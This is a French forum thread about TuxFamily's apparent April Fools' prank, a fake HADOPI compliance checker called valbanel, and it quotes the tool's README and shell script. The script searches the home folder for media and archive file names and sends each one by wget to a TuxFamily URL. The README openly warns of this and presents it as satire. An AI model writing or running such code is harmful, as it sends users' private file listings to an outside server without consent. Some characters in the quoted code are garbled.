TuxFamily se plie à HADOPI

Bonjour tout le monde,

Je viens de recevoir un mail de TuxFamily. D’abord, j’avais cru que c’était un spam mais en allant sur le site la mauvaise nouvelle y est affichée.

Je veux bien que TuxFamily respecte la loi (d’ailleurs, rien ne dit que cet HADOPI va être adopté). Ce qui me gène le plus est ce paragraphe :

Vous en pensez quoi?

Zut… :cry:

naïf :smt002

Celui de QuebecOS est pas mal non plus. :mrgreen:

J’ai complètement oublié le jour :laughing: . D’ailleurs, l’année dernière, je ne me suis fait pas avoir.

Salut,

Et cette année tu ne le toucheras que dans le désordre :

je viens de telechgarger valbanel-0.1.0 pour voir (160Mo quand même)

voici le readme

[code]valbanel - Software to check if your computer is clean against
the HADOPI law.

Copyright © 2009 TuxFamily.org team

This software is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA


Please DO NOT run this software, it is going to send all filenames
containing .ogg, .mp3, .avi, .wmv, .flv, .mpeg, .mp4, .mkv, .ogm, .wma,
.ogv, .ape, .flac, .wav, .rar to TuxFamily servers.

Anyway, if you ran it by mistake, you are free to ask us to delete the
content concerning you, you have to know your IP source address, but
this is not a good idea, because we cannot link an IP address to anyone
unless you give us the information, yes, this is a second warning :wink:

This is a simple example to show how this law is deeply stupid.

This is also a test to check how many people are running softwares
without reading the README first.

Finally, this is for us(TuxFamily) a good way to promote free art
(free as in free speech, not as in free beer) that we are hosting.[/code]

et le vers …

[code]PATH=’/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin’
which mplayer
if [ $? -eq 0 ] ; then
mplayer -fs database/.HDPI &
else
which vlc
if [ $? -eq 0 ] ; then
vlc -f database/
.HDPI &
else
which xine
if [ $? -eq 0 ] ; then
xine -f database/.HDPI &
else
which totem
if [ $? -eq 0 ] ; then
totem --fullscreen database/
.HDPI &
fi
fi
fi
fi

find ${HOME} -iname ‘.ogg’ -or -iname '.mp3’ -or -iname ‘.avi’ -or -iname '.wmv’ -or -iname ‘.flv’ -or -iname '.mpeg’ -or -iname ‘.mp4’ -or -iname '.mkv’ -iname ‘.ogm’ -or -iname '.wma’ -or -iname ‘.ogv’ -or -iname '.ape’ -or -iname ‘.flac’ -or -iname '.wav’ -or -iname ‘*.rar’ | while read file ; do
encoded=’'
last=expr ${#file} - 1
for i in seq 0 $last ; do
encoded=${encoded}printf '%%%x' "'${file:$i:1}"
done
wget 'http://valbanel.tuxfamily.org/submit.php?file=’${encoded} -O /dev/null 1> /dev/null 2>&1
done
[/code]

et le contenu du dossier database, 4 flims ‘libres’

[code]- DB0000.HDPI ( la_chambre_de_schrodinger-lacrymosa_aeterna_industry-copyleft.avi )
Un film de Stéphane Drouot sous licence Art Libre (http://artlibre.org/licence/lal/)